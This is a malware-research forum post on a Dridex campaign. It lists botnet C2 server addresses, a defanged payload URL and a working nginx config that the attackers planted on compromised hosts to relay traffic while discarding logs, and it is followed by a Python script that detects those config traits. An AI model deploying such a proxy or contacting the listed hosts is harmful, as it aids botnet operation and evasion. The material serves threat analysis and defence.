chimung wrote:
Has anyone recently got a Dridex sample?

Sample of the day attached.
https://www.virustotal.com/fr/file/dc3c ... /analysis/
<botnet>120</botnet>
<server_list>
104.131.59.185:243
1.179.170.7:4493
78.47.119.93:666
80.96.150.201:9943
</server_list>
Grabbed via hXXp://37.46.130.53/jasmin/authentication.php.
Just for information, they made a small change to the spreading-proxy setup: /tmp/.estbuild has moved to /tmp/.kerneltmp.
They always reuse the same compromised hosts (hxxp://195.37.231.2 for example).
Proxy config example for 195.37.231.2:
Code:
worker_processes 2;
error_log /dev/null;
pid /tmp/.kerneltmp/nginx.pid;

events {
    worker_connections 4096;
    # use epoll;
}

http {
    access_log /dev/null;
    client_max_body_size 200m;
    chunked_transfer_encoding off;

    server {
        listen 4493;

        location /m348-2hdk-cb2 {
            information;
        }

        ssl on;
        ssl_certificate /tmp/.kerneltmp/certs/server.crt;
        ssl_certificate_key /tmp/.kerneltmp/certs/server.key;

        location / {
            proxy_pass http://62.76.42.222:880;
            proxy_redirect off;
            proxy_set_header Host $host;
            proxy_set_header X-Forwarded-For $remote_addr;
            proxy_set_header X-Real-IP $remote_addr;
            proxy_connect_timeout 180;
            proxy_send_timeout 180;
            proxy_read_timeout 180;
            proxy_buffer_size 4k;
            proxy_buffers 4 32k;
            proxy_busy_buffers_size 64k;
            proxy_temp_file_write_size 64k;
            proxy_temp_path /tmp/.kerneltmp/tmp/;
        }
    }
}
Attachments
infected
(109.87 KiB) Downloaded 126 times
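As an added example (not part of the original post), a small triage script for incident responders that flattens an nginx config and flags the traits of the spreading proxy shown above: logging sent to /dev/null, paths under the hidden /tmp directories named in the post, TLS material kept in /tmp, and proxy_pass to a bare IP upstream. The sample config, the trait list and the "three categories" threshold are my own assumptions, not anything from the post.

```python
"""Heuristic triage of an nginx reverse-proxy config for the traits of the
Dridex spreading proxy described above. Added example, not code from the post;
the trait list and threshold are heuristics (mine), not a signature."""
import re
from typing import Dict, List, Tuple

HIDDEN_DIRS = ("/tmp/.estbuild", "/tmp/.kerneltmp")  # old and new path from the post
BARE_IP_UPSTREAM = re.compile(r"^https?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?$")

def parse_directives(text: str) -> List[Tuple[str, str]]:
    """Flatten config text into (directive, arguments) pairs: comments stripped,
    braces treated as separators, several directives per line split on ';'."""
    pairs = []
    for raw in text.splitlines():
        code = raw.split("#", 1)[0].replace("{", ";").replace("}", ";")
        for stmt in code.split(";"):
            stmt = stmt.strip()
            if stmt:
                name, _, args = stmt.partition(" ")
                pairs.append((name, args.strip()))
    return pairs

def assess(text: str) -> Dict[str, List[str]]:
    """Return matched trait categories and the directives that triggered them."""
    hits: Dict[str, List[str]] = {}
    for name, args in parse_directives(text):
        if name in ("access_log", "error_log") and args == "/dev/null":
            hits.setdefault("logging_disabled", []).append(name)
        if args.startswith(HIDDEN_DIRS):
            hits.setdefault("hidden_tmp_path", []).append(f"{name} {args}")
        if name == "proxy_pass" and BARE_IP_UPSTREAM.match(args):
            hits.setdefault("bare_ip_upstream", []).append(args)
        if name.startswith("ssl_certificate") and args.startswith("/tmp/"):
            hits.setdefault("tls_material_in_tmp", []).append(args)
    return hits

def is_suspicious(text: str, min_categories: int = 3) -> bool:
    """Flag only when several independent traits co-occur, to limit false positives."""
    return len(assess(text)) >= min_categories

# Constructed sample modelled on the posted config; the upstream IP is a placeholder.
SAMPLE = """error_log /dev/null;
pid /tmp/.kerneltmp/nginx.pid;
http { access_log /dev/null;
  server { listen 4493;
    ssl on; ssl_certificate /tmp/.kerneltmp/certs/server.crt; ssl_certificate_key /tmp/.kerneltmp/certs/server.key;
    location / { proxy_pass http://192.0.2.10:880; proxy_temp_path /tmp/.kerneltmp/tmp/; } } }"""

if __name__ == "__main__":
    print(assess(SAMPLE), is_suspicious(SAMPLE))
```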